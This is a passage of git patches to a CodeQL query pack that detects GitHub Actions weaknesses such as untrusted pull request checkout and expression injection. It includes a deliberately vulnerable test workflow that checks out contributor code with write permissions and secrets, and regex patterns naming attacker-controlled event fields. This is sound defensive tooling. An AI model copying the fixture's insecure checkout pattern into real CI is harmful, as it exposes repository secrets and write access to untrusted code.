ubuntu-latest + env: + min-python-version: "3.10" + + steps: + - name: Checkout repository + uses: actions/checkout@v3 + with: + fetch-depth: 0 + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Set up Python ${{ env.min-python-version }} + uses: actions/setup-python@v2 + with: + python-version: ${{ env.min-python-version }} + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip install -r requirements.txt + + - name: Lint with flake8 + run: flake8 + + - name: Check black formatting + run: black . --check + if: success() || failure() + + - name: Check isort formatting + run: isort . --check + if: success() || failure() + + - name: Check mypy formatting + run: mypy + if: success() || failure() + + test: + permissions: + # Gives the action the necessary permissions for publishing new + # comments in pull requests. + pull-requests: write + # Gives the action the necessary permissions for pushing data to the + # python-coverage-comment-action branch, and for editing existing + # comments (to avoid publishing multiple comments in the same PR) + contents: write + runs-on: ubuntu-latest + strategy: + matrix: + python-version: ["3.10"] + + steps: + - name: Check out repository + uses: actions/checkout@v3 + with: + fetch-depth: 0 + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Set up Python ${{ matrix.python-version }} + uses: actions/setup-python@v2 + with: + python-version: ${{ matrix.python-version }} + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip install -r requirements.txt + + - name: Run unittest tests with coverage + run: | + pytest -n auto --cov=autogpt --cov-report term-missing --cov-branch --cov-report xml --cov-report term + env: + CI: true + PROXY: ${{ secrets.PROXY }} + AGENT_MODE: ${{ vars.AGENT_MODE }} + AGENT_TYPE: ${{ vars.AGENT_TYPE }} + + - name: Upload coverage reports to Codecov + uses: codecov/codecov-action@v3 + + - name: Stage new files and commit + id: stage_files + run: | + git add tests + git diff --cached --quiet && echo "No changes to commit" && exit 0 + git config user.email "github-actions@github.com" + git config user.name "GitHub Actions" + git commit -m "Add new cassettes" + TIMESTAMP_COMMIT=$(date +%Y%m%d%H%M%S) # generate a timestamp + echo "TIMESTAMP_COMMIT=TIMESTAMP_COMMIT" >> $GITHUB_ENV + + + - name: Create PR + id: create_pr + if: ${{ env.TIMESTAMP_COMMIT != null }} + uses: peter-evans/create-pull-request@v5 + with: + commit-message: Update cassettes + branch: cassette-diff-PR-${{ github.event.pull_request.number }}-${{ env.TIMESTAMP_COMMIT }} + title: "Update cassette-diff-PR${{ github.event.pull_request.number }}-${{ env.TIMESTAMP_COMMIT }}" + body: "This PR updates the cassettes. Please merge it." + + + - name: Check PR + if: ${{ env.TIMESTAMP_COMMIT != null }} + run: | + echo "Pull Request Number - ${{ steps.create_pr.outputs.pull-request-number }}" + echo "Pull Request URL - ${{ steps.create_pr.outputs.pull-request-url }}" + + - name: Comment PR URL in the current PR + if: ${{ env.TIMESTAMP_COMMIT != null }} + uses: thollander/actions-comment-pull-request@v2 + with: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + message: | + Please click [HERE](${{ steps.create_pr.outputs.pull-request-url }}) and merge this PR to update the cassettes. + + - name: Fail if new PR created + if: ${{ env.TIMESTAMP_COMMIT != null }} + run: exit 1 diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 6620d2ac385..67fcc5555d1 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -1,5 +1,8 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index 7527a1e15f2..be1c7cbfebd 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -1 +1,4 @@ -| .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on 'pull_request_target'. | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 87b284e5e6b49b431aef3c23099ac80b0fe8753e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 19:14:57 +0100 Subject: [PATCH 0093/1267] update --- ql/lib/codeql/actions/Ast.qll | 8 +- .../codeql/actions/dataflow/FlowSources.qll | 89 +++++++++++-------- 2 files changed, 55 insertions(+), 42 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 271182a05dd..3d675bebce0 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -5,9 +5,11 @@ module Utils { bindingset[expr] string normalizeExpr(string expr) { result = - expr.regexpReplaceAll("[\\.\\'\\[\\]\"]+", ".") - .regexpReplaceAll("\\.$", "") - .regexpReplaceAll("\\.\\s", " ") + expr.replaceAll("['", ".") + .replaceAll("']", "") + .replaceAll("[\"", ".") + .replaceAll("\"]", "") + .regexpReplaceAll("\\s*\\.\\s*", ".") } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 23ae225e07e..d3a96e1a2c7 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,6 +1,7 @@ import actions import codeql.actions.DataFlow import codeql.actions.dataflow.ExternalFlow +import codeql.actions.Ast::Utils as Utils /** * A data flow source. @@ -24,8 +25,11 @@ abstract class RemoteFlowSource extends SourceNode { bindingset[context] private predicate isExternalUserControlledIssue(string context) { - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*title\\b") or - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*body\\b") + exists(string reg | + reg = ["\\bgithub\\.event\\.issue\\.title\\b", "\\bgithub\\.event\\.issue\\.body\\b"] + | + Utils::normalizeExpr(context).regexpMatch(reg) + ) } bindingset[context] @@ -33,35 +37,39 @@ private predicate isExternalUserControlledPullRequest(string context) { exists(string reg | reg = [ - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*title\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*body\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*label\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*default_branch\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*description\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*homepage\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*ref\\b", - "\\bgithub\\s*\\.\\s*head_ref\\b" + "\\bgithub\\.event\\.pull_request\\.title\\b", "\\bgithub\\.event\\.pull_request\\.body\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.label\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.default_branch\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.description\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.homepage\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b" ] | - context.regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(reg) ) } bindingset[context] private predicate isExternalUserControlledReview(string context) { - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*review\\s*\\.\\s*body\\b") + Utils::normalizeExpr(context).regexpMatch("\\bgithub\\.event\\.review\\.body\\b") } bindingset[context] private predicate isExternalUserControlledComment(string context) { - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*comment\\s*\\.\\s*body\\b") + Utils::normalizeExpr(context).regexpMatch("\\bgithub\\.event\\.comment\\.body\\b") } bindingset[context] private predicate isExternalUserControlledGollum(string context) { - context - .regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pages\\[[0-9]+\\]\\s*\\.\\s*page_name\\b") or - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pages\\[[0-9]+\\]\\s*\\.\\s*title\\b") + exists(string reg | + reg = + [ + "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.page_name\\b", + "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.title\\b" + ] + | + Utils::normalizeExpr(context).regexpMatch(reg) + ) } bindingset[context] @@ -69,26 +77,29 @@ private predicate isExternalUserControlledCommit(string context) { exists(string reg | reg = [ - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*message\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*message\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*author\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*author\\s*\\.\\s*name\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*committer\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*committer\\s*\\.\\s*name\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*author\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*author\\s*\\.\\s*name\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*committer\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*committer\\s*\\.\\s*name\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.message\\b", + "\\bgithub\\.event\\.head_commit\\.message\\b", + "\\bgithub\\.event\\.head_commit\\.author\\.email\\b", + "\\bgithub\\.event\\.head_commit\\.author\\.name\\b", + "\\bgithub\\.event\\.head_commit\\.committer\\.email\\b", + "\\bgithub\\.event\\.head_commit\\.committer\\.name\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.author\\.email\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.author\\.name\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email\\b", + "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name\\b", ] | - context.regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(reg) ) } bindingset[context] private predicate isExternalUserControlledDiscussion(string context) { - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*discussion\\s*\\.\\s*title\\b") or - context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*discussion\\s*\\.\\s*body\\b") + exists(string reg | + reg = ["\\bgithub\\.event\\.discussion\\.title\\b", "\\bgithub\\.event\\.discussion\\.body\\b"] + | + Utils::normalizeExpr(context).regexpMatch(reg) + ) } bindingset[context] @@ -96,18 +107,18 @@ private predicate isExternalUserControlledWorkflowRun(string context) { exists(string reg | reg = [ - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow\\s*\\.\\s*path\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_branch\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*display_title\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_repository\\b\\s*\\.\\s*description\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*message\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*author\\b\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*author\\b\\s*\\.\\s*name\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*committer\\b\\s*\\.\\s*email\\b", - "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*committer\\b\\s*\\.\\s*name\\b", + "\\bgithub\\.event\\.workflow\\.path\\b", + "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", + "\\bgithub\\.event\\.workflow_run\\.display_title\\b", + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.description\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.message\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.author\\.email\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.author\\.name\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.email\\b", + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.name\\b", ] | - context.regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(reg) ) } From 0e50204672f05fdd33b115ff36a2c9f5c2c10bef Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 22:19:55 +0100 Subject: [PATCH 0094/1267] More regexp improvements --- ql/lib/codeql/actions/ast/internal/Ast.qll | 31 ++++++------ .../codeql/actions/dataflow/ExternalFlow.qll | 4 +- .../codeql/actions/dataflow/FlowSources.qll | 8 +-- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 4 +- .../Security/CWE-020/CompositeActionsSinks.ql | 1 + .../CWE-020/CompositeActionsSources.ql | 1 + .../CWE-020/CompositeActionsSummaries.ql | 1 + .../CWE-020/ReusableWorkflowsSinks.ql | 1 + .../CWE-020/ReusableWorkflowsSources.ql | 1 + .../CWE-020/ReusableWorkflowsSummaries.ql | 1 + .../CWE-094/CriticalExpressionInjection.ql | 1 + .../Security/CWE-094/ExpressionInjection.ql | 1 + ql/src/Security/CWE-829/UntrustedCheckout.ql | 49 ++++++++++--------- 13 files changed, 59 insertions(+), 45 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 14f3cd2ecd9..7ebed407c0f 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1,5 +1,6 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations +private import codeql.actions.Ast::Utils as Utils /** * Gets the length of each line in the StringValue . @@ -833,9 +834,9 @@ class StepsExpressionImpl extends ContextExpressionImpl { string fieldName; StepsExpressionImpl() { - expression.regexpMatch(stepsCtxRegex()) and - stepId = expression.regexpCapture(stepsCtxRegex(), 1) and - fieldName = expression.regexpCapture(stepsCtxRegex(), 2) + Utils::normalizeExpr(expression).regexpMatch(stepsCtxRegex()) and + stepId = Utils::normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 1) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 2) } override string getFieldName() { result = fieldName } @@ -856,9 +857,9 @@ class NeedsExpressionImpl extends ContextExpressionImpl { string fieldName; NeedsExpressionImpl() { - expression.regexpMatch(needsCtxRegex()) and - fieldName = expression.regexpCapture(needsCtxRegex(), 2) and - neededJob.getId() = expression.regexpCapture(needsCtxRegex(), 1) and + Utils::normalizeExpr(expression).regexpMatch(needsCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(needsCtxRegex(), 2) and + neededJob.getId() = Utils::normalizeExpr(expression).regexpCapture(needsCtxRegex(), 1) and neededJob.getLocation().getFile() = this.getLocation().getFile() } @@ -886,9 +887,9 @@ class JobsExpressionImpl extends ContextExpressionImpl { string fieldName; JobsExpressionImpl() { - expression.regexpMatch(jobsCtxRegex()) and - jobId = expression.regexpCapture(jobsCtxRegex(), 1) and - fieldName = expression.regexpCapture(jobsCtxRegex(), 2) + Utils::normalizeExpr(expression).regexpMatch(jobsCtxRegex()) and + jobId = Utils::normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 1) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 2) } override string getFieldName() { result = fieldName } @@ -911,8 +912,8 @@ class InputsExpressionImpl extends ContextExpressionImpl { string fieldName; InputsExpressionImpl() { - expression.regexpMatch(inputsCtxRegex()) and - fieldName = expression.regexpCapture(inputsCtxRegex(), 1) + Utils::normalizeExpr(expression).regexpMatch(inputsCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } @@ -936,8 +937,8 @@ class EnvExpressionImpl extends ContextExpressionImpl { string fieldName; EnvExpressionImpl() { - expression.regexpMatch(envCtxRegex()) and - fieldName = expression.regexpCapture(envCtxRegex(), 1) + Utils::normalizeExpr(expression).regexpMatch(envCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(envCtxRegex(), 1) } override string getFieldName() { result = fieldName } @@ -959,8 +960,8 @@ class MatrixExpressionImpl extends ContextExpressionImpl { string fieldName; MatrixExpressionImpl() { - expression.regexpMatch(matrixCtxRegex()) and - fieldName = expression.regexpCapture(matrixCtxRegex(), 1) + Utils::normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) } override string getFieldName() { result = fieldName } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 008b5a19ce6..7e265fb2570 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -1,6 +1,6 @@ private import internal.ExternalFlowExtensions as Extensions -import codeql.actions.DataFlow -import actions +private import codeql.actions.DataFlow +private import actions /** * MaD sources diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index d3a96e1a2c7..a586cab4a32 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,7 +1,7 @@ -import actions -import codeql.actions.DataFlow -import codeql.actions.dataflow.ExternalFlow -import codeql.actions.Ast::Utils as Utils +private import actions +private import codeql.actions.DataFlow +private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.Ast::Utils as Utils /** * A data flow source. diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index fddf537ed1d..c10334436aa 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -2,10 +2,10 @@ * Provides classes representing various flow steps for taint tracking. */ -import actions +private import actions private import codeql.util.Unit private import codeql.actions.DataFlow -import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.dataflow.ExternalFlow /** * A unit class for adding additional taint steps. diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 1f90efa5bcc..0ea0713983d 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 0edeb0a7ec8..8e4275f27c7 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql index 59a05f64b6c..8b8b5af3c45 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index d84566dab04..31fbc1eaae2 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql index 6e88f36fece..e5612d06343 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql index 4f710a16e8f..444ce028954 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 66a055634c7..e24b1ab9ddc 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -13,6 +13,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index d59cc07cad2..1e7414e5ce6 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -13,6 +13,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 438e3dfe7fc..c9ad93d18b2 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -18,32 +18,37 @@ import actions /** An If node that contains an actor, user or label check */ class ControlCheck extends If { ControlCheck() { - Utils::normalizeExpr(this.getCondition()) - .regexpMatch([ - ".*github\\.actor.*", ".*github\\.triggering_actor.*", - ".*github\\.event\\.pull_request\\.user\\.login.*", - ".*github\\.event\\.pull_request\\.labels.*", ".*github\\.event\\.label\\.name.*" - ]) + exists( + Utils::normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.actor\\b", // actor + "\\bgithub\\.triggering_actor\\b", // actor + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user + "\\bgithub\\.event\\.pull_request\\.labels\\b", // label + "\\bgithub\\.event\\.label\\.name\\b" // label + ], _, _) + ) } } bindingset[s] predicate containsHeadRef(string s) { - Utils::normalizeExpr(s) - .matches("%" + - [ - "github.event.number", // The pull request number. - "github.event.pull_request.head.ref", // The ref name of head. - "github.event.pull_request.head.sha", // The commit SHA of head. - "github.event.pull_request.id", // The pull request ID. - "github.event.pull_request.number", // The pull request number. - "github.event.pull_request.merge_commit_sha", // The SHA of the merge commit. - "github.head_ref", // The head_ref or source branch of the pull request in a workflow run. - "github.event.workflow_run.head_branch", // The branch of the head commit. - "github.event.workflow_run.head_commit.id", // The SHA of the head commit. - "github.event.workflow_run.head_sha", // The SHA of the head commit. - "env.GITHUB_HEAD_REF", - ] + "%") + exists( + Utils::normalizeExpr(s) + .regexpFind([ + "\\bgithub\\.event\\.number\\b", // The pull request number. + "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", // The ref name of head. + "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", // The commit SHA of head. + "\\bgithub\\.event\\.pull_request\\.id\\b", // The pull request ID. + "\\bgithub\\.event\\.pull_request\\.number\\b", // The pull request number. + "\\bgithub\\.event\\.pull_request\\.merge_commit_sha\\b", // The SHA of the merge commit. + "\\bgithub\\.head_ref\\b", // The head_ref or source branch of the pull request in a workflow run. + "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", // The branch of the head commit. + "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", // The SHA of the head commit. + "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", // The SHA of the head commit. + "\\benv\\.GITHUB_HEAD_REF\\b", + ], _, _) + ) } /** Checkout of a Pull Request HEAD ref */ @@ -68,7 +73,7 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { or exists(string varname | containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and - line.matches("%" + varname + "%") + exists(line.regexpFind(varname, _, _)) ) ) ) From 872b1f88f053dbb29a422f5fa0b33b3e0933a907 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 22:47:19 +0100 Subject: [PATCH 0095/1267] More regexp improvements --- ql/lib/codeql/actions/Ast.qll | 9 +++++---- ql/lib/codeql/actions/ast/internal/Ast.qll | 4 ++-- ql/src/Debug/partial.ql | 1 + .../Security/CWE-094/.github/workflows/test.yml | 4 ++-- .../CWE-094/CriticalExpressionInjection.expected | 10 +++++----- .../Security/CWE-094/ExpressionInjection.expected | 10 +++++----- 6 files changed, 20 insertions(+), 18 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 3d675bebce0..143e89512fe 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 